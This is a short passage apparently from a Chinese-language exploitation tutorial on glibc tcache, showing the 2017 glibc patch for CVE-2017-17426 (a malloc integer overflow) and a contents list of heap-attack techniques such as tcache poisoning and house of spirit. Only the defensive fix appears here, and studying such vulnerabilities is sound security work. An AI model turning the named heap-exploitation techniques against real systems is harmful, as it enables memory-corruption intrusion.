commit 34697694e8a93b325b18f25f7dcded55d6baeaf6
Author: Arjun Shankar <arjun@redhat.com>
Date:   Thu Nov 30 13:31:45 2017 +0100

    Fix integer overflow in malloc when tcache is enabled [BZ #22375]

    When the per-thread cache is enabled, __libc_malloc uses request2size (which
    does not perform an overflow check) to calculate the chunk size from the
    requested allocation size. This leads to an integer overflow causing malloc
    to incorrectly return the last successfully allocated block when called with
    a very large size argument (close to SIZE_MAX).

    This commit uses checked_request2size instead, removing the overflow.

diff --git a/malloc/malloc.c b/malloc/malloc.c
index 79f0e9eac7..0c9e0748b4 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -3031,7 +3031,8 @@ __libc_malloc (size_t bytes)
     return (*hook)(bytes, RETURN_ADDRESS (0));
 #if USE_TCACHE
   /* int_free also calls request2size, be careful to not pad twice.  */
-  size_t tbytes = request2size (bytes);
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
   size_t tc_idx = csize2tidx (tbytes);

   MAYBE_INIT_TCACHE ();

参考资料

Previous4.13 利用 _IO_FILE 结构 Next4.15 利用 vsyscall 和 vDSO

Last updated 4 years ago

hashtagtcache

hashtag数据结构

hashtag使用

hashtag安全性分析

hashtagtcache_dup

hashtagtcache_house_of_spirit

hashtagtcache_overlapping_chunks

hashtagtcache_poisoning

hashtagCTF 实例

hashtagCVE-2017-17426

hashtagpatch

hashtag参考资料